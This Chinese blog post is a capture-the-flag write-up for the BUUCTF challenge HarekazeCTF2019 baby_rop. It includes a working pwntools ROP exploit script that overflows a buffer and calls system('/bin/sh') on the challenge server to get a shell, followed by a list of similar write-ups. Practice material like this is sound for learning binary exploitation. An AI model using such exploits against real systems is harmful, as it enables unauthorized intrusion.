[BUUCTF]PWN——[HarekazeCTF2019]baby_rop

最新推荐文章于 2025-09-02 02:41:02 发布
原创 最新推荐文章于 2025-09-02 02:41:02 发布 · 359 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了通过IDA分析64位程序,寻找system和/bin/sh字符串,利用溢出漏洞设置rdi、shell及system地址,并构造payload远程执行的过程。在目标系统中,flag文件不在根目录,利用find命令进行查找。

例行检查,64位,开启NX保护。
在这里插入图片描述
运行一下
在这里插入图片描述
用IDA打开。shift+f12检索字符串,看到了system和/bin/sh
在这里插入图片描述
shelladdr=0x601048
在这里插入图片描述
systemaddr=0x400496
在这里插入图片描述
查看主函数,v4的输入没有长度限制 ,可以造成溢出,由于程序 是64位的,所以传参会用到寄存器
当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。
当参数为7个以上时,后面的依次从 “右向左” 放入栈中。
在这里插入图片描述
找到rdi的位置。
在这里插入图片描述
rdiaddr=0x400683

from pwn import*

r=remote('node3.buuoj.cn',27557)

shell=0x601048
system=0x400496
rdi=0x400683

payload='a'*(0x10+8)+p64(rdi)+p64(shell)+p64(system)

r.sendline(payload)
r.interactive()

flag不在根目录下,利用find -name flag找一下
在这里插入图片描述
在这里插入图片描述

[HarekazeCTF2019]baby_rop[BUUCTF]
moonlightsunshin的博客
05-05 594
这个时候思路就很清晰了根据64位函数传参的特点构造ROP链就行,32位与64位传参的区别这里就不再赘述,读者可以看上一篇jarvisoj_level2_x64[BUUCTF] ,根据名字可以猜到这道题考的rop同时是64位的程序。用find -name flag查找路径再cat。
[HarekazeCTF2019]baby_rop1
m0_64195960的博客
06-30 937
前言:有两个新的知识点,一个是寻找函数地址,一个是当flag不在根目录下的解决办法开启了栈不可执行保护我们看到了system函数,我们通过shift+f12找一下字符串呜呜它给的实在太多了,有system函数,有/bin/sh,有栈溢出下面介绍两种找system函数地址的方式(因为博主之前只会做那种白给后门函数的题,或者gdb找)注意:我们在这里不是嗯翻,一个程序plt装载的位置大概在灰色部分后面一点(具体原因就不展开啦)我们可以通过调上方彩色的部分来定位这个有点烦,但还是讲讲这样就可以直接获得的,比较发现
buuctf|[HarekazeCTF2019]baby_rop 1
m0_64236521的博客
05-02 1470
buuctf|[HarekazeCTF2019]baby_rop 1 分析 下载文件重命名为pwn_15,checksec一下 只开启了NX,64位,用ida看看 这里可以栈溢出,同时在侧面看到了system() shift+F12查看字符串 找到binsh,由于是64位,我们要寄存器传参,ROPgadget下 exp如下 from pwn import* p=remote('node4.buuoj.cn',25977) #p=process("./pwn_15") system_addr=0x
BUUCTF [HarekazeCTF2019]baby_rop
qq_51821131的博客
07-28 251
简单rop 分析程序 存在栈溢出 存在字符串binsh 找到返回地址 代码如图,由于是64位,先通过寄存器传参,所以利用pop|ret 打通后发现flag文件不在根目录 从而利用find -name flag,找到flag在/home/babyrop/flag中,cat一下即可 ...
buuctf|pwn-[HarekazeCTF2019]baby_rop-wp
l2645470582_的博客
11-08 334
1.例行检查 我们看到该文件开启了堆保护 2.我们用64位的IDA打开该文件 按shift+f12查看关键字符串,我们看到“/bin/sh”这个关键字符串 我们双击查看它的位置:0x0601048 3.我们去main函数里面看看 我们发现v4 = var_10,他的地址为:0x10 我们要拿到权限:system("/bin/sh") 所以我们要找到system地址:0x0400490 我们双击_system,system在plt表里面 4...
[BUUCTF]PWN——[HarekazeCTF2019]baby_rop2
mcmuyanga的博客
10-04 5520
[HarekazeCTF2019]baby_rop2 题目附件 步骤: 例行检查,64位,开启了nx保护 运行了一下程序,了解大概的执行情况 64位ida载入,shift+f12检索程序里的字符串,没有发现可以直接利用的,从main函数开始看程序 利用思路: 程序很简单,buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为” system(‘/bin/sh’)“,那样在执行13行语句的时候,程序回去调用我们布置好的栈,从而得到shell 但是程序里没有现成
BUUCTF pwn——[HarekazeCTF2019]baby_rop
CNS-Enterprise BCC-1701-J
04-04 246
BUUCTF 做题练习
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2
Y_peak的博客
02-14 381
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2 题目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2 checksec一下,64位,开启NX,应该要用到ROPgadget,先看看 在IDA中 思路 利用printf先leek出来一个地址,这里选用了read的地址。找到libc,计算偏移,最终算出,system函数地址和’/bin/sh’字符串的地址。由于是64位,注意寄存器储存参数。(参数小于等于
BUUCTF PWN [HarekazeCTF2019]baby_rop
Rt1Text的博客
05-27 418
1.checksec+运行 64位/NX堆栈不可执行 2.IDA进行中 1.main函数 本题函数倒不是很多 很明显,格式化字符串漏洞 2.system bin/sh 3.offset 总体来看64位寄存器传参 3.EXP from pwn import* p=remote('node4.buuoj.cn',27198) shell=0x601048 system=0x400496 rdi=0x400683 payload=b'a'*(...
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2744
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
BUU-[HarekazeCTF2019]baby_rop
qq_45771413的博客
04-27 2132
查看保护 IDA scanf没限制输入长度,这里可以溢出v4 寻找system和敏感字符串: 都找到了,看来可以缝合缝合了。 解题 这次还是rop,但是还是查阅了相关资料,比第一次做时理解要深刻点。也会用寻找ret返回的工具: ROPgadget ROP相关概念: ROP就是使用返回指令ret连接代码的一种技术 (同理还可以使用jmp系列指令和call指令,有时候也会对应地成为JOP/COP)。 一个程序中必然会存在函数,而有函数就会有ret指令。 而ret指令的本质是pop eip,即把当前栈顶的内
buuctf27 [HarekazeCTF2019]baby_rop2 1
weixin_74861133的博客
11-20 494
只开启了NX保护。
[HarekazeCTF2019]baby_rop wp (python3)
Kata_Jhin的博客
03-08 270
[HarekazeCTF2019]baby_rop wp (python3)
HarekazeCTF2019 baby_rop
m0_73743784的博客
08-28 354
非常经典的 ROP
HarekazeCTF2019_baby_rop
z1r0的博客
12-04 801
HarekazeCTF2019_baby_rop 查看保护 溢出,有system和bin,rop就行 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25987) else: r = process(file_name) elf = ELF(file
[HarekazeCTF2019]baby_rop
最新发布
Xiiaogu的博客
09-02 241
只有NX保护机制打开。接着运行指令得到文件属性显示babyrop为64位可执行文件。
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值